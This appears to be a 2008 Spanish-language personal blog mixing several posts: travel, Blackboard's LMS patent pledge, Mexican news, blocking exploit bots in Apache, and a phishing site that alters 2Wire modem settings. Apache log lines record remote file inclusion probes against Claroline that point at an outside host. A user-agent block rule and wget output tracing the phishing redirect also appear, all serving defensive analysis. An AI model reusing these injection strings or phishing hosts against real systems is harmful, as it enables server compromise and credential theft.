El Cuchitril

De nuestras vacaciones, eso es lo que voy a necesitar.

Ya en serio, la semana pasada me he dado la desintoxicación más larga de internet en un buen rato, contando tan solo con el celular y la televisión por cable.

No tenia idea de que a Guanajuato viajara tanta gente en semana santa… espero el año que viene esta semana pasarla plasta en casa, que no debo negar me diverti bastante y comi más de lo que debiera, rico y abundante y claro la visita al cubilete no podia faltar.

Eso si grandes agradecimientos a nuestro anfitrión al cual yo creo también le dificultamos un tanto los dias de descanso.

En fin de regreso con un monton de tarea y con amenaza de «examen» recien empiezen las clases, ah y claro con requerimiento de dar un par de asesorias a grupos para el uso de moodle, que lejano suena cuando estaba en mi cubiculo intentando que 5 estudiantes de maestria le picarán al claroline y ahora una buena parte de mis propios estudiantes de licenciatura y unos 30 profesores estan usando moodle a diferentes niveles…

Si mas backlog, que quieren se supone que estoy ocupado :P, el 22 de febrero desire2learn fue la primera victima de Black Board que logro obtener una patente sobre LMS (mas noticias via googlenews) hay más información en el blog de desire2learn sobre «la injuction» (tengo que ir al tumbaburros, ya que no estoy bien seguro que cosa es eso) que tienen en este momento para vender su sistema en USA. Por otro lado notas interesantes al respecto son:

Slashdot

e-literate

Press release de BB donde por cierto dice que no planea demandar a nadie… mhhh.. mas bien revisando ese fue correo a los «clientes» actuales (cosa que en algun momento fuimos), el cual no puedo reproducir aqui… sin embargo estos recursos dan la misma visión:

BB Patente Pledge

FAQ de BB sobre el patent pledge, una parte digna de citar:

«My institution uses an Open Source Software Course Management System that also includes certain free proprietary software elements. Am I covered by this pledge?

Blackboard recognizes that Open Source Software may at times incorporate certain proprietary elements to enhance functionality within the software. Therefore, in addition to the pledge above, Blackboard hereby irrevocably agrees not to assert the listed U.S. patents, as well as all counterparts of these patents issued in other countries, against the following open source initiatives: Sakai, Moodle, ATutor, Bodington, Elgg, Lon-Capa, Claroline, Connexions, Dokeos, Learnloop, Interact, Segue, Whiteboard. Additionally, Blackboard hereby irrevocably agrees not to assert the listed U.S. patents, as well as all counterparts of these patents issued in other countries against any school, library or museum for the use of such Open Source Software Course Management System to the extent that it was acquired from such open source initiative.

Does this pledge apply to Course Management Systems that are developed in the future?

Yes. This pledge applies to all Course Management Systems regardless of the date of development, use or sale.

My institution uses an Open Source Software Course Management System (e.g., Sakai, Moodle), does this pledge apply to us?

Yes. To promote the use and development of Open Source Software, Blackboard agrees that it will not assert the listed patents against any institution using or providing Open Source Software.

**My institution uses a Course Management System which is not Open Source Software (e.g., D2L). Does this pledge apply to us?

Suing an institution to enforce our patent would not be in Blackboard

Ultimamente no requiere de siquiera revisar nuestras fuentes, muestra de ello, la tenemos más recientemente en el articulo de Carlos Mota en el periodico Milenio donde despotrica de la UNAM y más aun de «¿Quién quiere estudiar filosofía en la UNAM?».

Nomas dos precisiones, 1) El Mosh no estudio filosofia, sino fisica. 2) Mota para variar escribe para el publico de mileño… quien de los que estudian ciencias sociales y humanidades va a ser contratado por esas empresas extranjeras, obvio, nadie. Por que no tienen necesidad de ese perfil, mejor aún se contesta solo, en EU puedes estudiar filosofia y graduarte de MBA… ¿por que? por que finalmente lo que requieres es tener un ninetofiver y poder acceder a creditos y endeudarte toda la vida…

Si, ya se deberia estar estructurando mi tesis…

Bueno a finales de enero paso desapercibida esta nota: Obtiene registro Partido Solidaridad (El universal)

Un extracto del mismo:

«Tiene 250 mil afiliados, su presidente es Mario Alberto Romo Gutiérrez y su lema es Vida, Familia y Justicia Social; está conformado por sinarquistas

Ciudad de México
Miércoles 30 de enero de 2008
17:54 El Movimiento de Participación Solidaria (MPS) se transforma en el Partido Solidaridad, luego de que concluyó el trámite para obtener registro como Partido Político Nacional.

Su presidente será Mario Alberto Romo Gutiérrez y tienen 250 mil afiliados.

La Junta Local del Instituto Federal Electoral (IFE) en el Distrito Federal y 150 delegados del nuevo partido aceptaron el logo y lema «Vida, Familia y Justicia Social».

Tras 22 asambleas estatales, realizada cada uno en un estado, se logró crear la nueva asociación política, según un comunicado de prensa emitido por el partido.

Desde agosto de 2007, la otrora MPS pretendía formalizarse como una institución política.»

Para variar los exploiters automatizados siguen usando libwww-perl… bueno en lighttpd ya lo resolvi, anoche cai en cuenta que tambien en apache estaba teniendo muchas peticiones de estas… y todavia tengo 3 apaches en maquinas relativamente grandes, pero me parece que es un desperdicio de conexiones para la mas pequeña de ellas (384MB), más aun me aburre tener que leer mi reporte de logwatch con un monton de alertas de «probes»…

foobar:/var/log/apache# grep libwww access.log
124.217.247.166 – – [06/Mar/2008:11:43:01 -0600] «GET /~vicm3/consol2006/Ponencia//claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 391 «-» «libwww-perl/5.79»
124.217.247.166 – – [06/Mar/2008:11:43:01 -0600] «GET //claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 364 «-» «libwww-perl/5.79»
124.217.247.166 – – [06/Mar/2008:12:01:42 -0600] «GET /~vicm3/plataformas/Plataformas%20UPN%201-8-2006.ppt//claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 412 «-» «libwww-perl/5.79»
124.217.247.166 – – [06/Mar/2008:12:01:43 -0600] «GET /~vicm3/plataformas//claroline/tracking/userLog.php?rootSys=http://www.ar-vision.com/galery.txt? HTTP/1.1» 404 383 «-» «libwww-perl/5.79»
foobar:/var/log/apache#

Y no tenia bien esto, por un error en un bomberazo anterior en donde los vhost los habia definido con common en lugar de combined, por lo que no estaba guardando los nombres de los agentes (si se que es casi trivial cambiar el agent en script de perl, en todo caso, eso deja fuera a los wanna-be).

Bueno tal cual lo intente con lighttpd pues a buscar como han resuelto otros el problema, me encontre con un muy buen ejemplo para evitar el harvesting de emails, pero mejor aún en los comentarios me encontre algunos tips para implementarlo en http://www.evolt.org/article/Using_Apache_to_stop_bad_robots/18/15126/ apache para bloquear scripts que intenten vulnerabilidades.

[code=’Apache’]
### Anti exploiters
SetEnvIfNoCase User-Agent «.*libwww.*» bad_bot

Order Allow,Deny
Allow from all
Deny from env=bad_bot

SetEnvIfNoCase User-Agent

Bueno no demasiada novedad, pero parece ser que mediante flash, tambien se puede cambiar el password del 2wire. (nota mas bien muestra el flash mientras ejecuta otras cosas, wget ayuda mucho)

http://promociones-telcel.mx.gd

vicm3@avalon:~$ wget http://promociones-telcel.mx.gd
–15:14:54– http://promociones-telcel.mx.gd/
=> `index.html’
Resolving promociones-telcel.mx.gd… 213.177.195.71
Connecting to promociones-telcel.mx.gd|213.177.195.71|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 728 [text/html]

100%[====================================>] 728 –.–K/s

15:14:55 (12.49 MB/s) – `index.html’ saved [728/728]

vicm3@avalon:~$ more index.html

[code=’Html4Strict’]

<br /> <body bgcolor="#FFFFFF" text="#000000"><br /> <a href="http://72.167.148.67/telcel/">Pulsa aquí para ir a PROMOCIONES T<br /> ELCEL</a><br /> </body><br />

[/code]

vicm3@avalon:~$ wget http://72.167.148.67/telcel/
–15:15:06– http://72.167.148.67/telcel/
=> `index.html.1′
Connecting to 72.167.148.67:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified [text/html]

[ <=> ] 9,738 –.–K/s

15:15:06 (71.63 KB/s) – `index.html.1′ saved [9738]

vicm3@avalon:~$ more index.html.1

[code=’Html4Strict’]

[/code]

Bueno tiene la bondad de cambiar el password que haya puesto el usuario y de nuevo va sobre banamex, bancoazteca, bancomer, etc. Es una ventaja que use mi propio dns y no el del 2wire.

Por otra parte creo aun les falta arreglar un par de detalles…

Update 2/3/2008
Un par de cosas que note con esto, ya con un poco de calma:
1) Si tu configuración no es la default ayuda bastante 192.168.1.254 no es la direccion de mi 2wire es 0.253 primero por que originalmente mi dns era el .0.254 y segundo uso la red 192.168.0.1 en lugar de la 192.168.1.1 por que asi aprendi en su epoca a hacer el ejemplo y se me quedo.
2) En la configuracion de mis maquinas fijas uso como dns primario mi maquina linux 192.168.0.1 y como secundario y gw el 2wire, de tal forma que aun cuando apago el flash este mi 2wire, no le pudo añadir las entradas de dns y el otro dia viendo cuando un mejor script lo logro, como tomo los valores primero del dns linux, no me afecto (aunque si me llevo un rato encontrar como quitarlas).
3) Se supone que 2wire y telmex ya estan al tanto de esto y han sacado un firmware actualizado, el cual segun de manera automagica debiera de llegar a nuestros modems (a la fecha el mio nomas no se actualiza), siguiendo un consejo en adslreports levante un ticket de soporte en 2wire (a ver si el martes se dignan a contestarlo)… si no pues a ver si perdiendo un rato tiempo en soporte, me cambian el modem (yeah right).
4) Una solucion que se me ocurre para quien no puede poner su propio dns es usar los dns de opendns o de otros proyectos que ofrecen dns y no los del modem… con todo en muchas ocasiones tienen menor latencia y se caen menos seguido, en todo caso, espero pronto envien la actualización mi modem es un 1700HG con fw3.7.1!!!!

Que ademas no se encuentran en el texto (addenum):

http://www.cyberciti.biz/tips/how-to-install-ssl-lighttpd-https-configuration.html Sí se puede usar lighttpd con ssl, claro fuera del alcance de mi platica, por cierto que recomiendo ampliamente este sitio, tiene muchos how-to que no estan tán bien estructurados en el sitio de lighttpd.

Munin El programa que permite hacer esas grafiquitas que tanto exito tuvieron en la presentacion, basado en rrd tool.

Jaws el CMS que aun uso para publicar mi blog (y que logre correr en 58MB de RAM)

El proveedor de VPS con el que estuve jugando (que ahora ya ofrece Xen ademas de OpenVZ y que cuesta 7USD al mes.

Las fotos que tome en el CONSOL2008

Sí, se que ademas las tengo que agregar al texto de la ponencia, pero de mientras… ahi estan, para quien alla terminado aquí en el blog.

A la izuiqerda Turi, a la derecha Pks.

Oh… ya parece tanto tiempo Foto originalmente tomada de aqui donde tuvieron a bien obviar quien estaba administrando la Sun U450, con 4CPUS, 4GB de RAM y varios discos.

Años despues, vimos que con Debian jalaba mucho mejor que con Suse, desgraciadamente ese servidor termino siendo el espejo del de NRH (Nomina y Recursos Humanos) que corre una horrenda aplicacion en Informix sobre Solaris y del que junto con otros dos sysadmin tuve el nada agradable trabajo de probar el manual de procedimientos de instalación y tambien la creación del manual de procedimientos de recuperación en caso de emergencia.